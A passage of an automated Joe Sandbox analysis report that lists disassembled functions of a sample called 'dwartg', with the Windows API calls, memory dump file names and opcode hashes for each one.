                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: d3c94d4f48a01ba3db05e6b93154f1cd19979db7db2cbb54d986cc2b48343c94
                                                                                              • Instruction ID: f2195bb828fe8b2ea82a809d70679526c7a4aa0e698cad56240c6d1306bdc8d9
                                                                                              • Opcode Fuzzy Hash: d3c94d4f48a01ba3db05e6b93154f1cd19979db7db2cbb54d986cc2b48343c94
                                                                                              • Instruction Fuzzy Hash: 12319E71C00259DADF15DF64D855AEEBBB4AF19300F5044AEE409B3242D779AF04CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0074AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0074ACF8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc
                                                                                              • String ID:
                                                                                              • API String ID: 190572456-0
                                                                                              • Opcode ID: 97c4724bc64c193d23198ec98cd5ddc2944f1748fc3fa595c1099496600009d1
                                                                                              • Instruction ID: 1345c6250d9fee23df933212a0fdbfba1fa5235bdc7c76e2c28e0bfce3efe5dc
                                                                                              • Opcode Fuzzy Hash: 97c4724bc64c193d23198ec98cd5ddc2944f1748fc3fa595c1099496600009d1
                                                                                              • Instruction Fuzzy Hash: F311CA33B40625BF9B259F28DC9099A7395EB8436171A8520FD15AB298DB38DD018BE2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0072CE40 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0072CE45
                                                                                                • Part of subcall function 00725E37: __EH_prolog.LIBCMT ref: 00725E3C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 1c58f78c3537fcea649f411b7033894026d20ed36ea5107722bf078d6209edcc
                                                                                              • Instruction ID: c327d65058cebc1cf9e283d4340559b4f3bf802326779a77646bc6ebf21e66d9
                                                                                              • Opcode Fuzzy Hash: 1c58f78c3537fcea649f411b7033894026d20ed36ea5107722bf078d6209edcc
                                                                                              • Instruction Fuzzy Hash: 5E11A3B1A00354DEEB16DB79D509BAEB7E89F54300F14046DE446D3282DB785F04CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00729215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: fe89e3260542cda57e5efbdc10422130a09d87aadc1c3bb41e63df4b58faf4e6
                                                                                              • Instruction ID: 8e0d87010a66ee6d2e4e84a7e2982be8684e39c9a78e285c6f09310a376ac642
                                                                                              • Opcode Fuzzy Hash: fe89e3260542cda57e5efbdc10422130a09d87aadc1c3bb41e63df4b58faf4e6
                                                                                              • Instruction Fuzzy Hash: 04018233900538EBCF26EBA8DC869DEB775FF88740F054125E912B7152DA38CD14C6A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0074C479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0074B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00749813,00000001,00000364,?,00743F73,00000050,?,00761030,00000200), ref: 0074B177
                                                                                              • _free.LIBCMT ref: 0074C4E5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 614378929-0
                                                                                              • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                              • Instruction ID: 349474441d809b23eae72f7768b31798753720e24c4e15b8a5b28c00019568f2
                                                                                              • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                              • Instruction Fuzzy Hash: 7C014972200345ABE3318F69C88596AFBECFB85330F25052DE184832C1EB34A805C774
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0074B136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00749813,00000001,00000364,?,00743F73,00000050,?,00761030,00000200), ref: 0074B177
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 0b79ec3cf191a2f86296faee576d29a9cc35fccec3a504a14671c67922f90b78
                                                                                              • Instruction ID: 5c4180f35686233cfb0499b650afed762215a3dab5c57551a3d8cf4527a29f90
                                                                                              • Opcode Fuzzy Hash: 0b79ec3cf191a2f86296faee576d29a9cc35fccec3a504a14671c67922f90b78
                                                                                              • Instruction Fuzzy Hash: 9FF0E93264512CB7DB215B35AC19B9F3748AF41770B198111FC0897190DB2CDD0182E1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00743C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00743C3F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc
                                                                                              • String ID:
                                                                                              • API String ID: 190572456-0
                                                                                              • Opcode ID: e5a24f1f116383bad74cffdbc9cb244dbfea8cd4572de7929fc94cb958ba1fee
                                                                                              • Instruction ID: 77c60563b323183ffd2bf31ad363e4a5a393295e218996c0181634a678b7c6ca
                                                                                              • Opcode Fuzzy Hash: e5a24f1f116383bad74cffdbc9cb244dbfea8cd4572de7929fc94cb958ba1fee
                                                                                              • Instruction Fuzzy Hash: 8FF0EC362003169FDF114E68EC4499A7799EF01B617104125FE1DE71D0DB35EA20C7E0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00748E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0074CA2C,00000000,?,00746CBE,?,00000008,?,007491E0,?,?,?), ref: 00748E38
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 819bd5a456fc27f8128ab358645ed0537c142d4678b07e4499d94c74c7380152
                                                                                              • Instruction ID: 7d0e8fd4f42fdcbc3c3c5028e8097820cf0fcc4eb74f6c428113469b6c17734e
                                                                                              • Opcode Fuzzy Hash: 819bd5a456fc27f8128ab358645ed0537c142d4678b07e4499d94c74c7380152
                                                                                              • Instruction Fuzzy Hash: 17E06D3124623DA7EAF126759C09B9F76489F41BA8F2A4161BC1996091DF6DCC0182E7
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00725ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00725AC2
                                                                                                • Part of subcall function 0072B505: __EH_prolog.LIBCMT ref: 0072B50A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: fd461250f5b897ad6a7e58a6eeeb0d68f636b3a9ccdce60cd6a94a2a707c1f5e
                                                                                              • Instruction ID: aa4ddce96ca0a227c7565126fe48c0e30ea1ee8781384a146687d48442595e5e
                                                                                              • Opcode Fuzzy Hash: fd461250f5b897ad6a7e58a6eeeb0d68f636b3a9ccdce60cd6a94a2a707c1f5e
                                                                                              • Instruction Fuzzy Hash: A901AF30810794DAE725EBB8C06A7DEFBE4DF64304F50848DE45653283CBB91B08DBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00729620 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,007295D6,?,?,?,?,?,00752641,000000FF), ref: 0072963B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: ChangeCloseFindNotification
                                                                                              • String ID:
                                                                                              • API String ID: 2591292051-0
                                                                                              • Opcode ID: b91104a3384c18c4752c9843e409e25b63a1207ab07e7ede4f483a8b196c164d
                                                                                              • Instruction ID: 22ae1defe09b50a8f620567bb2664f3e45299bdf79b2b10c5f5df64693671358
                                                                                              • Opcode Fuzzy Hash: b91104a3384c18c4752c9843e409e25b63a1207ab07e7ede4f483a8b196c164d
                                                                                              • Instruction Fuzzy Hash: B8F0E270081B259FDB308A20E848B92B7F8AB12321F082B1ED1E7429E0D369698D9A40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0072A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0072A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A6C4
                                                                                                • Part of subcall function 0072A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A6F2
                                                                                                • Part of subcall function 0072A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A6FE
                                                                                              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0072A598
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$FileFirst$CloseErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1464966427-0
                                                                                              • Opcode ID: 0989ca8f21a701431b104e24f8766958189a096acaa50b11dc1721f2d0a3d9bd
                                                                                              • Instruction ID: e8755cf037f864fcd39b8f9dd5fad6ce382b2500148145cd3db4323ed5078aa7
                                                                                              • Opcode Fuzzy Hash: 0989ca8f21a701431b104e24f8766958189a096acaa50b11dc1721f2d0a3d9bd
                                                                                              • Instruction Fuzzy Hash: 10F082310087A0FBCB2257B4A908BCB7BD16F5A331F048A49F1FD52196C37950A49B33
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00730E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 00730E3D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExecutionStateThread
                                                                                              • String ID:
                                                                                              • API String ID: 2211380416-0
                                                                                              • Opcode ID: 713d43d28a49736ca257f09d5ff34c29aa39ebcd3b80d1324bc657f5ed069dab
                                                                                              • Instruction ID: 8dd55f9ec05724f23a8afb1fcaf761f60bbf81ceaa2ee73b3d973e555abe7fce
                                                                                              • Opcode Fuzzy Hash: 713d43d28a49736ca257f09d5ff34c29aa39ebcd3b80d1324bc657f5ed069dab
                                                                                              • Instruction Fuzzy Hash: 33D0C25170116896EE113328282D7FE260A8FC6311F0C0066F04A57283CE9C0C82A2B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GdipAlloc.GDIPLUS(00000010), ref: 0073A62C
                                                                                                • Part of subcall function 0073A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0073A3DA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                              • String ID:
                                                                                              • API String ID: 1915507550-0
                                                                                              • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                              • Instruction ID: e947b35635b61c12c20aa5b3d3b0376d3b05018a52aed7c1a4acfe5e96d56d30
                                                                                              • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                              • Instruction Fuzzy Hash: 34D0C971214209FAFF426B618C17D6EBA99EB01340F048125B8C2D5193EAB9DD10A663
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00731B3E), ref: 0073DD92
                                                                                                • Part of subcall function 0073B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0073B579
                                                                                                • Part of subcall function 0073B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0073B58A
                                                                                                • Part of subcall function 0073B568: IsDialogMessageW.USER32(000104AA,?), ref: 0073B59E
                                                                                                • Part of subcall function 0073B568: TranslateMessage.USER32(?), ref: 0073B5AC
                                                                                                • Part of subcall function 0073B568: DispatchMessageW.USER32(?), ref: 0073B5B6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 897784432-0
                                                                                              • Opcode ID: f03dc89f88be6151b307e9a70c0b15180eb1a7f18f469c7f31c94ad493d61749
                                                                                              • Instruction ID: 1941cfb792a2b4ce7c5e81fae76d75f828cf92ca2d1ed4ac41712604acb2f212
                                                                                              • Opcode Fuzzy Hash: f03dc89f88be6151b307e9a70c0b15180eb1a7f18f469c7f31c94ad493d61749
                                                                                              • Instruction Fuzzy Hash: 53D09E31144300BAE6012B51CD0AF0B7AA2BB88F04F004654B385740B28AB69D31DB16
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DloadProtectSection.DELAYIMP ref: 0073E5E3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: DloadProtectSection
                                                                                              • String ID:
                                                                                              • API String ID: 2203082970-0
                                                                                              • Opcode ID: c317852db3e452386e53cd1a54a1360222494555db38c61e9a257c3e2b84f155
                                                                                              • Instruction ID: 245113295c581b73dc06970424cd07be52a6b5d1f7ab3569a0de64d4a6fb21a4
                                                                                              • Opcode Fuzzy Hash: c317852db3e452386e53cd1a54a1360222494555db38c61e9a257c3e2b84f155
                                                                                              • Instruction Fuzzy Hash: 80D0C9B45C0280DBF601EBA9DC4A7943268B364B05FE08101F145924D3DBAC4492A729
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 007298BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileType.KERNELBASE(000000FF,007297BE), ref: 007298C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
